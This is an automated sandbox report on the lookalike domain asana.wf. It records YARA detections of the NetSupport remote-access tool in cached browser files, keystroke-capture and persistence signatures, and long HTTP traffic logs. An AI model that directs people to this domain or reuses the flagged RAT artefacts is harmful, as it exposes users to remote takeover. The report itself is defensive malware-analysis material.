Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://asana.wf

Overview

General Information

Sample URL:http://asana.wf
Analysis ID:1431861
Infos:

Detection

NetSupport RAT
Score:1
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

Creates a DirectInput object (often for capturing keystrokes)
Stores files to the Windows start menu directory
Yara detected NetSupport remote tool

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 4780 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://asana.wf/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1936,i,14722219438862826777,18196455829393117014,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_242JoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    dropped/chromecache_185JoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      dropped/chromecache_301JoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        dropped/chromecache_343JoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          There are no malicious signatures, click here to show all signatures.

          Source: https://recaptcha.net/recaptcha/api2/anchor?ar=1&k=6Ldjgd0kAAAAAITm7ipWF7o7kPL_81SaSfdINiOc&co=aHR0cHM6Ly93d3cudmlydXN0b3RhbC5jb206NDQz&hl=en&v=V6_85qpc2Xf2sbe3xTnRte7m&size=invisible&cb=7i4v2m4h9i6yHTTP Parser: No favicon
          Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.16:49767 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.54.200.130:443 -> 192.168.2.16:49768 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49769 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49948 version: TLS 1.2
          Source: Binary string: "D:\\a\\1\\s\\x64\\Release\\PsfRuntime64.pdb source: PsfRuntime64.dll.2.dr", source: chromecache_343.1.dr
          Source: Binary string: "D:\\a\\1\\s\\Win32\\Release\\PsfLauncher32.pdb source: PsfLauncher32.exe.2.dr", source: chromecache_343.1.dr
          Source: Binary string: "D:\\a\\1\\s\\x64\\Release\\PsfLauncher64.pdb source: PsfLauncher64.exe.2.dr", source: chromecache_343.1.dr
          Source: Binary string: "D:\\a\\1\\s\\Win32\\Release\\PsfRunDll32.pdb source: PsfRunDll32.exe.2.dr", source: chromecache_343.1.dr
          Source: Binary string: "D:\\a\\1\\s\\Win32\\Release\\PsfRuntime32.pdb source: PsfRuntime32.dll.2.dr", source: chromecache_343.1.dr
          Source: Binary string: "D:\\a\\1\\s\\Win32\\Release\\PsfLauncher32.pdb! source: PsfLauncher32.exe.2.dr", source: chromecache_343.1.dr
          Source: Binary string: "D:\\a\\1\\s\\x64\\Release\\PsfRunDll64.pdb source: 7za.exe, 00000002.00000003.1033037111.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, PsfRunDll64.exe.2.dr, PsfRunDll64.exe0.2.dr" source: chromecache_343.1.dr
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 23.49.5.232
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
          Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
          Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
          Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
          Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
          Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
          Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
          Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
          Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
          Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.130
          Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.130
          Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.130
          Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.130
          Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.130
          Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.130
          Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.130
          Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.130
          Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.130
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
          Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
          Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
          Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
          Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
          Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
          Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
          Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
          Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
          Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
          Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: asana.wfConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /css/reskin-0451c4949d.css HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /css/style.css HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/HOME24-web-hero-3x-en-US.webp HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/logo-ratio-40pxheight-Amazon.svg HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/logo-ratio-40pxheight-McKesson.svg HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/logo-ratio-40pxheight-Amazon.svg HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fonts/gordita/gordita-regular.woff HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://asana.wfsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fonts/gordita/gordita-medium.woff HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://asana.wfsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/logo-ratio-40pxheight-Johnson-Johnson.svg HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/logo-ratio-40pxheight-Dell.svg HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/logo-ratio-40pxheight-McKesson.svg HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pop-up.js HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/HOME24-web-hero-3x-en-US.webp HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/logo-ratio-40pxheight-merck.webp HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/home24-marketing-team-en-ui.webp HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/home24-goals-ui.webp HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/logo-ratio-40pxheight-Dell.svg HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/home24-ai-en.webp HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/logo-ratio-40pxheight-merck.webp HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/home24-security.webp HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://asana.wfSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/card-overstock-asana-customer.webp HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/card-hubspot.webp HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/card-figma-asana-customer.webp HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/home24-marketing-team-en-ui.webp HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/card-sony-music-asana-customer.webp HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/home24-goals-ui.webp HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/card-zoom-1x.webp HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/home24-security.webp HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/home24-demo-thumbnail.webp HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/home24-ai-en.webp HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/home24-resources-thumbnail.webp HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/card-hubspot.webp HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/card-overstock-asana-customer.webp HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/home24-templates-thumbnail.webp HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
